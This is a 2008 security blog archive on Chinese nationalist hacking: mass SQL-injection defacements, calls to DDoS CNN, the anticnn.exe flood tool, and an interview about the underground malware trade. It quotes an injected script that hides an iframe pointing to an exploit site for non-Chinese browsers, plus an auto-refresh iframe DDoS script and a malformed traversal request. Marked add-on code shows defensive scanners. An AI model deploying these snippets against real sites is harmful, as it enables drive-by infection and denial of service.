Tag Archive 'malware'

May 15 2008

More Patriotic Hacking

Benny from security4all.be sent Heike a link to an article at the Internet Storm Center that covers some patriotic mass SQL-Injection attacks.  The attacker appended this text to the bottom of every compromised index.htm file (this text was copied from the ISC and includes their edits):

“This is a mass invasion.        Safeguard the motherland’s dignity!
F*** FRANCE!  F*** CNN!  I WILL ATTACK you ALWAYS  !
I love my motherland!
sorry
Please understand that I
IF YOU WANT TO SAY SOMETHING .
PLEASE SEND EMAIL TO kiss117276@163.com “

Another site that Paul from pauldotcom.com found and contributed to ISC includes obfuscated JavaScript with a function that checks whether the web browser is configured for PRC/Mainland Chinese (zh-cn). Anyone who doesn’t have zh-cn gets redirected to a site hosting browser exploits. Cool. Here is the code snippet from the ISC:

if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=http://www.ririwow.cn/index.htm" width=100 height=0></iframe>");}
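As an added example (not from the ISC write-up or the original post), here is a small scanner for the pattern above: a script that gates on the browser language and writes a zero-height iframe pointing at another host. The page host, the `attacker.example` host and the sample HTML are constructed for illustration.

```javascript
// Constructed sample: the host of the page being scanned (hypothetical name).
const SAMPLE_PAGE_HOST = "www.example-victim.test";

// Constructed sample index.htm fragment mimicking the injected snippet above;
// attacker.example is a placeholder, not the real host from the ISC report.
const SAMPLE_HTML = `
<html><body><h1>Welcome</h1>
<script>
if (navigator.systemLanguage=='zh-cn'){}else{document.writeln("<iframe src=http://attacker.example/index.htm width=100 height=0></iframe>");}
</script>
</body></html>`;

// Pull every <iframe ...> tag out of the raw source, including ones that only
// exist inside a script string, which is exactly where the injection hides.
function extractIframes(html) {
  const tags = [];
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = m[1];
    const src = /src\s*=\s*["']?([^\s"'>]+)/i.exec(attrs);
    const height = /height\s*=\s*["']?(\d+)/i.exec(attrs);
    const width = /width\s*=\s*["']?(\d+)/i.exec(attrs);
    tags.push({
      src: src ? src[1] : null,
      height: height ? Number(height[1]) : null,
      width: width ? Number(width[1]) : null,
    });
  }
  return tags;
}

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch (e) { return null; }
}

// Returns one finding per hidden iframe that points off-host; the reason notes
// whether the page also gates on the browser language, as the ISC sample does.
function scanForLanguageGatedIframe(html, pageHost) {
  const findings = [];
  const hasLanguageGate = /navigator\.(systemLanguage|userLanguage|language)\s*[!=]=/i.test(html);
  for (const f of extractIframes(html)) {
    const hidden = f.height === 0 || f.width === 0;
    const host = f.src ? hostOf(f.src) : null;
    const offHost = host !== null && host !== pageHost.toLowerCase();
    if (hidden && offHost) {
      findings.push({
        src: f.src,
        reason: hasLanguageGate
          ? "hidden off-host iframe behind a browser-language check"
          : "hidden off-host iframe",
      });
    }
  }
  return findings;
}
```

Run it over every index.htm pulled from a compromised host; a zero-size iframe to a host you do not own is the thing to look for, the language check is just the tell that it is targeted.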

This reminds me of the patriotic virus that Heike blogged about a while ago that only exploited machines configured for the traditional Chinese character set (most mainland Chinese use simplified).

Thanks for the heads-up Benny!

3 responses so far

May 09 2008

Korean Auction Site Hackers Arrested in PRC

Danwei linked to this article indicating that the hackers responsible for compromising the Korean auction site several months ago have been arrested in the PRC.  The article goes on to describe some interesting details such as:

KBS also talked to Chinese hackers who claim there is something of a black market for Korean personal information in China. They say Koreans hire Chinese hackers to break into sites to get information, which is then handed over and sold in Korea.

There is also some limited information about a tool that was used to compromise the Korean sites.

2 responses so far

Apr 24 2008

New “Kinda-Lazy” Chinese hacker attack on CNN scheduled for tomorrow. UPDATE x2

UPDATE FIZZLE: Just got word from Jose that nothing happened with the CNN website today. Chinese hackers are starting to make me look bad and I will not stand for that!! :)

If this keeps up, it may be easier to list the days that Chinese hackers are not calling for an attack on CNN.

Had some serious reservations about posting this article for a couple of reasons but decided it is probably worthwhile. The cons are that there is ZERO confirmation from other sites about the impending attack and the alert posting did not list a sponsoring organization. On the pro side, it included a website that was set up on the 20th (after the initial attack), which is linked in the post and looks like it is there to support the action.

So, large CAVEAT: UNCONFIRMED

Added bonus, stupid clock again:

The Announcement

At 8:00 pm (Beijing local) on 25 April, Chinese hackers will attack CNN

[Announcement] 2008-04-21 On 25 April, 8:00 pm (Beijing local), Chinese hackers will attack CNN.

Everyone, please pay attention to the issues regarding the effort to invade the CNN website. We are requesting the support of all Chinese. If you are an expert hacker, we request you ardently strive to invade www.cnn.com. If you are a novice, we request you use DDOS flood attack or put up a couple of pieces of hacker software. If you are not a hacker, we request that you land on the www.cnn.com website at 8:00 pm on 25 April.

Try with all your might to establish a link with the website in order to waste its resources. If their website is continually at capacity for three hours, the server may just crash. Don’t forget, there are over 1.4 billion Chinese! There are over 100 million Chinese online, they won’t be able to withstand us.

Please, assist us with the invasion of www.cnn.com, this represents the honor of China over the issue of Tibetan independence. The www.cnn.com website has put out a large amount of unsubstantiated reports that are a serious challenge and US hackers have already invaded many of our websites. It is time for revenge; let us begin a new round of Sino-US hacker wars. Let them know the strength of the Chinese people.

If it is convenient, please circulate this message to all of your groups. We need support…. Currently, many of us are going to this webpage to carry out the attack, http://www.goupsoft.com.cn/Bs_Cnn.html. The first time you open it, it might not display. Just refresh the page and it should be okay.

Kinda Lazy (but genius!)

Over at the attack website of goupsoft.com, you land on an automated webpage that uses your computer and IP address to continuously “attack” the CNN website unless you close the browser. My guess is that it is constantly making fresh requests from CNN to tie up bandwidth. The graphic below even shows the number of attacks you have made on the site.

Yeah, I kinda attacked CNN 24 times…Whoops! Well, CNN never returned my e-mail either! Damn, I’m sort of a Chinese hacker now? Anyway, the only really interesting thing in that blurb of Chinese above is that they call CNN a “whore.” Really, twice.

This Attack Method Spreading

While this might be the oldest trick in the book, it is new to me so I’m putting it out there. The website http://www.chenmin.org/doscnn.html is using pretty much the exact same attack method as mentioned previously.

Once again, you land on the webpage above and it begins refreshing the CNN website in an iFrame every five seconds, using up their bandwidth (Jumper explained this to me). So, I sort of attacked CNN another five, six, seven…forty times looking at the program. Here is Jumper’s full explanation from the question I e-mailed to him last night about the site:

Yes. It loads an iframe: And then it reloads itself every five seconds:

<script>
var e=document.getElementById('cnn');
setInterval("e.src='http://www.cnn.com'",5000);
//1000 means 1000 milliseconds; you can modify this and forward it
</script>

Probably not as effective as the Mao-inator program.

I direct your attention to the last line (emphasis mine) in Jumper’s e-mail. Number one, he dubs the program he analyzed yesterday as the Mao-inator™, which I personally find hilarious. Number two, there seems to be a slight amount of professional jealousy involved since he is dismissing my program as “less effective” than the one he worked with. Yeah, but did yours call CNN a “whore” didn’t think so! Less effective, I think not sir!

All kidding aside, this is an excellent method for incorporating large numbers of unskilled people into your DDoS attack. It comes with the added advantage of using their computers, IP addresses and bandwidth and you don’t have to train them. The only skill that is required is the ability to open a webpage in a browser and let it run. Plus, recruits who might not be so willing to stick around to the end of the fight, if tied to a computer all day, are free to do whatever they want while at the same time defending the motherland. My vote GENIUS!
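From the receiving end, the tell for this method is a browser re-requesting the same URL on a fixed timer. The following is an added example, not from the original post or from Jumper’s e-mail: it parses constructed Apache combined-format access-log lines and flags clients whose requests for one path arrive at a near-constant interval, reporting the Referer hosts so the attack page itself can be identified. The log lines, the 10.0.0.0/8 addresses and the `attack-page.example` host are all constructed.

```javascript
// Constructed Apache combined-format lines; attack-page.example is a placeholder
// for a page like the ones described above, and the addresses are private ranges.
const SAMPLE_LOG = [
  '10.0.0.5 - - [24/Apr/2008:12:00:00 +0000] "GET / HTTP/1.1" 200 512 "http://attack-page.example/doscnn.html" "Mozilla/4.0"',
  '10.0.0.5 - - [24/Apr/2008:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "http://attack-page.example/doscnn.html" "Mozilla/4.0"',
  '10.0.0.5 - - [24/Apr/2008:12:00:10 +0000] "GET / HTTP/1.1" 200 512 "http://attack-page.example/doscnn.html" "Mozilla/4.0"',
  '10.0.0.5 - - [24/Apr/2008:12:00:15 +0000] "GET / HTTP/1.1" 200 512 "http://attack-page.example/doscnn.html" "Mozilla/4.0"',
  '10.0.0.5 - - [24/Apr/2008:12:00:20 +0000] "GET / HTTP/1.1" 200 512 "http://attack-page.example/doscnn.html" "Mozilla/4.0"',
  // An ordinary reader: the front page revisited, but at human, irregular intervals.
  '10.0.0.9 - - [24/Apr/2008:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
  '10.0.0.9 - - [24/Apr/2008:12:00:37 +0000] "GET /world/ HTTP/1.1" 200 812 "http://www.cnn.com/" "Mozilla/4.0"',
  '10.0.0.9 - - [24/Apr/2008:12:01:10 +0000] "GET / HTTP/1.1" 200 512 "http://www.cnn.com/world/" "Mozilla/4.0"',
  '10.0.0.9 - - [24/Apr/2008:12:03:05 +0000] "GET / HTTP/1.1" 200 512 "http://www.cnn.com/world/" "Mozilla/4.0"',
  '10.0.0.9 - - [24/Apr/2008:12:05:42 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
];

const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5, Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };
const LOG_RE = /^(\S+) \S+ \S+ \[(\d{2})\/(\w{3})\/(\d{4}):(\d{2}):(\d{2}):(\d{2}) [^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/;

// Parse one line into {ip, ts (seconds), method, path, status, referer}.
// Assumes all lines carry the same timezone offset, so offsets cancel in gaps.
function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const ts = Date.UTC(+m[4], MONTHS[m[3]], +m[2], +m[5], +m[6], +m[7]) / 1000;
  return { ip: m[1], ts, method: m[8], path: m[9], status: +m[10], referer: m[11] };
}

function refererHost(ref) {
  try { return new URL(ref).hostname; } catch (e) { return null; }
}

// Flag (ip, path) pairs with at least minHits requests whose gaps all sit
// within `tolerance` seconds of the median gap: a timer, not a person.
function findPeriodicRefetchers(lines, { minHits = 4, tolerance = 1 } = {}) {
  const groups = new Map();
  for (const line of lines) {
    const r = parseLine(line);
    if (!r) continue;
    const key = `${r.ip} ${r.path}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(r);
  }
  const flagged = [];
  for (const reqs of groups.values()) {
    if (reqs.length < minHits) continue;
    reqs.sort((a, b) => a.ts - b.ts);
    const gaps = reqs.slice(1).map((r, i) => r.ts - reqs[i].ts);
    const median = [...gaps].sort((a, b) => a - b)[Math.floor(gaps.length / 2)];
    if (!gaps.every((g) => Math.abs(g - median) <= tolerance)) continue;
    const refs = new Set(reqs.map((r) => refererHost(r.referer)).filter(Boolean));
    flagged.push({ ip: reqs[0].ip, path: reqs[0].path, hits: reqs.length,
                   intervalSec: median, refererHosts: [...refs] });
  }
  return flagged;
}
```

Grouping the flagged clients by Referer host gives the list of recruiting pages to block or report; the participants themselves are just people with a browser tab open.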

Make up your own odds if this will actually take place. I have informed Jose Nazario at Arbor Networks who has been monitoring this situation closely and has had great insights.

UPDATE 1: Located the blog for Li Haiwei, the owner of the attack website goupsoft.com.cn, and my boy has some serious issues with CNN and Tibet. Lots of disturbing imagery for the whole family:

The graphic reads, “CNN- I like it. I am CNN.” Then some stuff way too small to read. The Nobel Peace Prize award you can read yourself and at the bottom Tibet.

UPDATE 2: Netcraft has a live performance monitor for the CNN website here.

4 responses so far

Apr 22 2008

More on anticnn.exe

CNN-hating Chinese nationalists can download a tool to send high volumes of requests to www.cnn.com in an attempt to knock it offline.  The tool is bundled in a .rar file that contains a readme and the pre-compiled Windows binary.  A quick virus check showed that some scanners identified it as a backdoor, but that didn’t seem to be the case.  When I ran the tool, a simple flag icon appeared in the lower right of my test VM.

When I click on the flag, the full interface appears with three options: start/stop, minimize and exit.

Here is a sample of the request/response I got after running it for a few seconds:

GET /aux/con/com1/../../[LAG]../.%%%%%%%%./../../../../fakecnn/redflag-stay-here.php.aspx.asp.cfm.jsp HTTP/1.1
Accept: */*
Host: www.cnn.com
Connection: Keep-Alive

HTTP/1.1 400 Bad Request
Date: Tue, 22 Apr 2008 12:12:34 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 287
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache Server at
www.cnn.com Port 80</address>
</body></html>

I read somewhere that it is self-updating but I never saw any requests other than DNS resolution (to my own configured DNS servers, not hard-coded) and requests to www.cnn.com.  I’ll run it in “paused” mode for a while to see what happens.
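The request line above is rejected by Apache with a generic 400, which tells a log reviewer nothing about why. As an added example (not from the original post), the check below names each feature of that request line so a filter or monitor can tag it explicitly: Windows reserved device names in the path, dot-dot segments, bare percent signs, unescaped brackets and stacked extensions. The only input it is tested against is the request line copied from the capture above.

```javascript
// Windows reserved device names; a path segment like /aux/ or /com1/ only
// makes sense as an attempt to trip up a Windows-hosted server or filter.
const RESERVED_DEVICE_NAMES = new Set([
  "con", "prn", "aux", "nul",
  ...Array.from({ length: 9 }, (_, i) => `com${i + 1}`),
  ...Array.from({ length: 9 }, (_, i) => `lpt${i + 1}`),
]);

// Classify a request line; returns {malformed, reasons}. Each reason maps to
// one feature of the anticnn.exe request, so a rule can name what it saw.
function analyzeRequestLine(requestLine) {
  const m = /^([A-Z]+) (\S+) HTTP\/(\d\.\d)$/.exec(requestLine);
  if (!m) return { malformed: true, reasons: ["not METHOD SP TARGET SP HTTP/x.y"] };
  const target = m[2];
  const segments = target.split("?")[0].split("/").filter(Boolean);
  const reasons = [];
  if (segments.includes("..")) reasons.push("dot-dot path traversal segment");
  if (segments.some((s) => RESERVED_DEVICE_NAMES.has(s.toLowerCase().split(".")[0]))) {
    reasons.push("Windows reserved device name in path");
  }
  // A '%' must introduce exactly two hex digits; '.%%%%%%%%.' does not.
  if (/%(?![0-9A-Fa-f]{2})/.test(target)) reasons.push("percent sign not followed by two hex digits");
  if (/[\[\]]/.test(target)) reasons.push("unescaped bracket characters in target");
  const last = segments.length ? segments[segments.length - 1] : "";
  const exts = last.split(".").slice(1);
  if (exts.length >= 3) reasons.push(`stacked extensions (.${exts.join(".")})`);
  return { malformed: reasons.length > 0, reasons };
}

// The request line captured from anticnn.exe (copied from the post above).
const ANTICNN_REQUEST_LINE =
  "GET /aux/con/com1/../../[LAG]../.%%%%%%%%./../../../../fakecnn/redflag-stay-here.php.aspx.asp.cfm.jsp HTTP/1.1";
```

Counting how many of these reasons fire per source address over a short window separates this tool’s traffic from the odd malformed request a broken client sends.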

UPDATE (0100GMT 23 April 08):  No suspicious traffic came from this binary (apart from what was expected, of course).

UPDATE (1628GMT 24 April 08): Heike and I have dubbed anticnn.exe the “Mao-inator”.

3 responses so far

Mar 27 2008

Chinese hackers would like to introduce you to Disk Wizard and the Mechanical Dog

diskwizardvirus.JPG

This seems to be one of the most popular articles currently floating around on Chinese hacker websites concerning the increasing resilience of new viruses and the virus industrial chain.  This will be an extreme gist because I’m kinda pressed for time today:

  1. Little Wu, expert gamer, depressed because all his virtual property is getting stolen
  2. Little Wu isn’t alone; for the past couple of days all the online gamers have been worried about a new virus called the Disk Wizard
  3. Disk Wizard is considered 10 times more serious than last year’s king of viruses, Panda Burning Incense
  4. According to reports, Disk Wizard can prohibit the use of any anti-virus software
  5. Disk Wizard can prevent the user from going into safe mode to remove the virus and from accessing their anti-virus webpage to request help
  6. CNCERT estimates the virus industrial chain is earning 238 million YUAN a year and causing losses of 7.6 billion YUAN
  7. Reported that the author of Mechanical Dog made 100,000 YUAN a month, more than four times the amount of top programmers
  8. Engineer from Kingsoft said that Trojans such as Mechanical Dog and others were working together to deliver the viruses
  9. Disk Wizard is capable of downloading AV Terminator (Mechanical Dog)
  10. These types of Trojan download tools have become the most popular platforms for virus manufacturers and also their most profitable
  11. Due to lack of oversight, it is becoming more common to see viruses for sale on the Internet
  12. Very easy to find malware-for-sale postings all over the place; use the QQ number to contact the seller
  13. Estimates that by 2010 China’s online gaming industry will earn 30 billion YUAN
  14. CNNIC reports China already has 40 million online gamers, making up 20% of their online population
  15. Report claims that laws need to be clarified to go after virus manufacturers; now it is only a misdemeanor

I really want to find a larger version of that chart at the top of the page, spent about 2 hours trying to locate it with no luck. If anyone finds it, please let me know.

Comments Off

Mar 21 2008

Darfur needs help, not malware…

Sudan

An interesting article in the Washington Post this morning about China-based hackers targeting a group of Darfur supporters called “Save Darfur Coalition”.  The article indicates that the Save Darfur Coalition is critical of the PRC role in Darfur. 

“The allegation fits a near decade-old pattern of cyber-espionage and cyber-intimidation by the Chinese government against critics of its human rights practices, experts said. It comes as calls for a boycott of the 2008 Beijing Olympics have been mounting since China’s crackdown on Tibetan protesters last week.”

This reminds me of the targeted attacks on members of Fa1un G0ng reported by Maarten Van Horenbeeck.  Also see Maarten’s CCC presentation here.  Heike reported on Maarten’s presentation earlier.

2 responses so far

Mar 08 2008

Horton hears a (Chinese hacker) Hu…Part IV

Horton hears a (Chinese hacker) Hu…Part I
Horton hears a (Chinese hacker) Hu…Part II
Horton hears a (Chinese hacker) Hu…Part III

The highest earnings come from selling loopholes.  This isn’t something the normal programmer can do; it takes a high level of skill to locate a loophole on a large company’s website.  According to hacker Hu, these loopholes can be used to carry out attacks on corporations and therefore sell for several tens of thousands of YUAN to several hundred thousand YUAN.

Not only that, hackers can receive requests to design viruses and the anti-viruses. Hackers can also put together groups of controlled computers to launch large-scale attacks. These groups of computers are called botnets in hacker groups.

Monitored data from CNCERT shows that China has five botnets that exceed 100,000 slave computers, and one or two of those have 300,000 slave computers. These slave networks can be leased and earn the hackers millions of YUAN a year. According to CNCERT, this section of the underground industry is exceeding 238 million YUAN a year and causing losses of over 7.6 billion YUAN.

Hacker Hu said that after the virus maker sells the virus, the virus’ journey has just begun.  For example, after a “Gun Buyer” purchases a virus to steal virtual property, they will hire a botnet to spread the virus. The disseminated virus can steal online game players’ money and weapons and send the stolen goods to a mailbox.

The botnet is the core for disseminating viruses but there is a fairly easy method to accomplish this. Hacker Hu smiles, “You get up early, go to the internet bar and capture the 30 computers there with a virus and go home and wait for the money.” The programmer or the person owning the botnet, can earn five FEN to five JIAO for every infected computer. The hacker industry has evolved to the point where there are very distinct divisions of labor. Each gang usually has ten or more people, some who spread the virus, some who steal virtual currency and some who launder the money.

NOTE: Five FEN is worth about .6 cents and five JIAO about 6 cents.

To launder virtual items, a member of the gang will open a lot of gamer accounts and a stolen article will be passed around among these different accounts and then sold. The game company doesn’t know which accounts are real players and which are sellers. Hacker Hu says that the virtual money is then sold at wholesale through a down-line surrogate.

In addition, hackers design other Trojans for sale that are mass produced and burned onto. Based on the exclusive nature or functionality of the Trojan, the price can be from tens of YUAN to over 1,000 YUAN.  Furthermore, some hacker organizations provide malicious advertising plug-in services.  These plug-ins cause a user’s computer to pop up a special window; every 1,000 pop-ups earns 12 YUAN. Currently, there are at least 50 malicious advertising agencies within the country (China).  CNCERT estimates that the annual production of malicious advertising amounts to 108 million YUAN.

Thus ends the saga of Chinese hacker HU!

Comments Off

Mar 06 2008

Horton hears a (Chinese hacker) Hu…Part III.

yuan.JPG

Horton hears a (Chinese hacker) Hu…Part I
Horton hears a (Chinese hacker) Hu…Part II

Normally, computers with known security loopholes are the targets for “Hanging the Horse.” Once these computers have been infected with a Trojan, it is very possible that someone browsing could unwittingly click on the Trojan and valuable information contained on the computer could fall into the client’s hands.  Another method of “Hanging the Horse” is through junk mail or posting documents that contain Trojans on forums that encourage users to download them.  Once the attack is successful, the targeted information can be stolen using hacker tools.

In hacker circles, these packets of information are called “Envelopes” and are divided up differently depending on the type of product; there are “Equipment Envelopes,” “QQ Envelopes,”…etc. The next sentence is a little tricky, but it seems to equate the sale of the “Envelopes” at this stage to a wholesale market.

NOTE: From a segment that appears later in this story, I believe that an “Equipment Envelope” is referring to one that contains online game virtual property like swords, helmets, armor…etc.

From there the hackers can gather the most valuable information, like QQ numbers that are relatively short or have a higher rank. Afterwards, these filtered “Second-hand Envelopes” move into the retail market.  After the “Traders” sort the envelopes, they will use BBS and e-commerce sites to make the final sale of the stolen virtual property (Q-money, online game equipment…etc.).

The “Gun Sellers,” “Horse Hangers,” “Major Clients,” and “Traders” all make money. The economic benefits are rapidly turning the word “hacker,” which was once synonymous with “Technology Knights,” into a dirty word. However, hacker Hu says that the real money makers in this chain are the major clients (namely, the one who steals the envelopes).

If done well, it is not difficult to make several tens of thousands of YUAN a month. Some people earn over 10 million YUAN a year. With the cooperation of as few as 2-3 or as many as 10 people, after this valuable passes through the underground chain it is sold all around the world.

It was reported that Li Jun, the programmer who wrote “Panda Burning Incense,” deposited nearly 10,000 YUAN a day into his account. After he was arrested by police, he acknowledged that he had made over 10 million YUAN.

Sorry, looks like it is going to be a 4-part post. More tomorrow.

Horton hears a (Chinese hacker) Hu…Part IV

4 responses so far

Mar 05 2008

Horton hears a (Chinese hacker) Hu…Part II. Or, want to buy a gun?

gun.JPG

continuation of Horton hears a (Chinese hacker) Hu

The article next asks the question, what is the nature of the Chinese hacker community? A reporter from the paper went inside several of the domestic (Chinese) hacker websites and forums to carry out an investigation in order to answer this question. In a network that specialized in selling online gamer information, the reporter was able to contact a hacker through his QQ number. The hacker was only willing to reveal his surname, Hu.

According to hacker Hu, he was 23 years old, had just graduated from a computer vocational school and was working as a programmer for a software firm in Shenzhen. Hacker Hu’s QQ name was “Envelope Seller.” Hu explained that he provided all categories of hacker services; installing Trojans, taking control of websites and intrusion.

Hacker Hu said that currently all the professional hackers were just like him and that most of them did not have a formal profession. They depended on their hacker business to make a living.

The article then recounts the 2007 case of Panda Burning Incense.  This was the virus unleashed by Li Jun, a 25-year-old hacker from Wuhan, who caused massive damage to domestic Chinese networks.

Hacker Hu explains that he is careful and meets his clients either through BBS or friends and afterwards they communicate through QQ.  Hu further explains that his services are specific to each customer and that he is not like Li Jun, who sold his virus to just anyone. Hu says he does this to prevent a similar wide-spread viral outbreak.

Hackers like Hu, who have the ability to program viruses, are called “Gun Sellers” and their main role is the manufacture of hacker tools. They then sell these tools to their down-line clients.  The clients pay several hundred or thousands of YUAN to “Gun Sellers” like Hu to purchase these hacker procedures, the most popular being Trojans.

The next step is to plant the Trojan on the website; this step is called “Hanging the Horse.” The client can complete this part themselves, or if they do not have the skills to do it, they can hire a specialist.  Hacker Hu will sometimes do this for his clients.

Sorry, CinC house just said, “If you don’t get off the computer, I will kill you!”
Gotta go, more tomorrow.

Horton hears a (Chinese hacker) Hu…Part III

Horton hears a (Chinese hacker) Hu…Part IV

4 responses so far

Mar 05 2008

Horton hears a (Chinese hacker) Hu

hortonhu.JPG

Yeah, sorry about the title…

This story comes via news.china.com and is an interview with a Chinese hacker named Hu.  The good news is that it is one of the most candid interviews I have ever read. The bad news is that it is very long and has a lot of technical language that I constantly struggle with.  So, it will be at least a three-part post (if not more) and will be heavily edited in some places. I also may call on one or two of you to lend a hand in coming up with the exact technical jargon. Our hacker Hu gives a very detailed look inside the economy of the underground world of Chinese hackers.

The article begins with a story about a Miss Liu, who returns home, turns on her computer and as she is skimming through webpages, a Word document suddenly opens.  At the top of the document, it begins to automatically write, “I have seen your picture, you are certainly very pretty!”

Due to her job at a large website portal, she immediately realizes this as a Trojan sequence and shuts off the power to the computer. (Miss Liu) “I didn’t expect that my computer could be hit by the Gray Pigeon (Trojan) and turned into a meat chicken (肉鸡). If I hadn’t turned off the computer, the hacker would still be controlling my computer and would also be able to send out data packets giving away all my computer’s secrets.”

The term Rouji (肉鸡), Meat Chicken, I believe is slang for a compromised/infected computer. (a little help!)

It is reported that Gray Pigeon is one of the most virulent viruses in the last several years. The 2007 China Computer Virus Epidemic Network Security Report classified it as the 3rd largest virus.  After infection, the computer can be completely controlled through long-distance attack. The hacker can easily copy, delete or download documents on the computer. Through long-distance attack (the hacker) can also record every keystroke, the user’s QQ number and online game user information. Furthermore, after infection, the computer that the hacker has invaded is called a meat chicken.

In fact, in China, there are several million users just like Miss Liu who are unaware that they are contributing to the strength of this network underground industrial chain.  According to statistics from the Kingsoft Global Anti-Virus Monitoring Center, in 2007, the nation (China) had over 50 million infected computers; an 18.15 percent increase over the same time last year with 90.56 percent of internet users suffering a virus attack. Among those, over 5 million of the infected computers were in Guangdong.

End Part I…tomorrow we will actually get into the interview with hacker Hu.

Horton hears a (Chinese hacker) Hu…Part II
Horton hears a (Chinese hacker) Hu…Part III
Horton hears a (Chinese hacker) Hu…Part IV

9 responses so far
